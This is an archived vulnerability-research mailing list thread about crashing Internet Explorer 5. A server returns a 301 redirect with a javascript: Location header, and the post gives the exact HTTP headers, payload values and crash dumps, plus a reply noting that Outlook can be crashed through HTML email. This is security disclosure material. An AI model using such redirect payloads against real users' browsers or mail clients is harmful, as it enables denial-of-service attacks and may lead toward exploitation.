Vulnerability Development mailing list archives
Re: IE5 crash
From: Mulder <Morpho () FBIAGENCY ORG>
Date: Sun, 24 Dec 2000 16:31:40 +0100
I have the same problem with outlook in windows ME. I never tried reproducing it but its very obvious since outlook uses IE so you could crash outlook by sending a HTML email with what you said in your email. Morpho ----- Original Message ----- From: "Dzzie Z" <dzzie () YAHOO COM> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Saturday, December 23, 2000 12:49 PM Subject: IE5 crash
Hi stumbled across this crash for IE..I am on 5.00.2614.3500 in Win98SE it seems pretty reproducable with an illegal op in URLMON.dll 1) create a web page (local is fine) and put in an image to one of your servers..this crash dosent even need an image extension on it...just aim
it
at a directory or script (works same when URL is requesting image as well) 2) have the server return the 301 found code with a location of 'javascript:<some js command>' = instant crash of IE... when I first started playign with this it was crashing explorer, I cant reproduce the explorer crash anymore...btu I have also updated my
scripting
engines and added j++ here are the exact headers sent back and forth to the server on the
request
and the crash log... just to clarify...the 'server: unix' thing is BS i put in when making the server [ Browser Request for http://127.0.0.1/ ] GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: 127.0.0.1 Connection: Keep-Alive [ Server Response Headers ] HTTP/1.1 301 Moved Permanently Server: Apache/1.3.11 (Unix) Pragma: no-cache Accept-Ranges: bytes Content-Length: 62 Connection: Close Content-Type: text/html Location: javascript:with(navigator){n='\n';alert(userAgent+n+platform)} IEXPLORE caused an invalid page fault in module URLMON.DLL at 0187:77037fb8. Registers: EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010206 EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30 ECX=77034258 DS=018f ESI=00434048 FS=4c77 EDX=81706d60 ES=018f EDI=00000001 GS=0000 Bytes at CS:EIP: 8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff Stack dump: 00000000 00000001 00433ec0 77037d5e 00434048 00000000 00000000 7af2a370 01149a60 00000000 017beb60 7ad906c0 00000001 00000000 01149b48 01149a60 ============================================== [ Browser Req for 127.0.0.1/image.gif ] GET /image.gif HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: 127.0.0.1 Connection: Keep-Alive [ Server Response Headers ] HTTP/1.1 301 Moved Permanently Server: Apache/1.3.11 (Unix) Pragma: no-cache Accept-Ranges: bytes Content-Length: 86 Connection: Close Content-Type: text/html Location: javascript:document.write('IE is so BUGGY'+' of course we are kind of abusing it too') IEXPLORE caused an invalid page fault in module URLMON.DLL at 0187:77037fb8. Registers: EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010202 EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30 ECX=77034258 DS=018f ESI=0043407c FS=4c1f EDX=8171e8c4 ES=018f EDI=00000001 GS=0000 Bytes at CS:EIP: 8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff Stack dump: 00000000 00000001 00433ef4 77037d5e 0043407c 00000000 00000000 7af2a370 01149cd0 00000000 017beb60 7ad906c0 00000001 00000000 01149db8 01149cd0 the question is... can anything more intresting be done with this crash? can anyone else reproduce?
Current thread:
- IE5 crash Dzzie Z (Dec 23)
- Re: IE5 crash Dan Kaminsky (Dec 25)
- Re: IE5 crash Mulder (Dec 26)
- <Possible follow-ups>
- Re: IE5 crash Doe, John (Dec 25)
- Re: IE5 Crash Dzzie Z (Dec 28)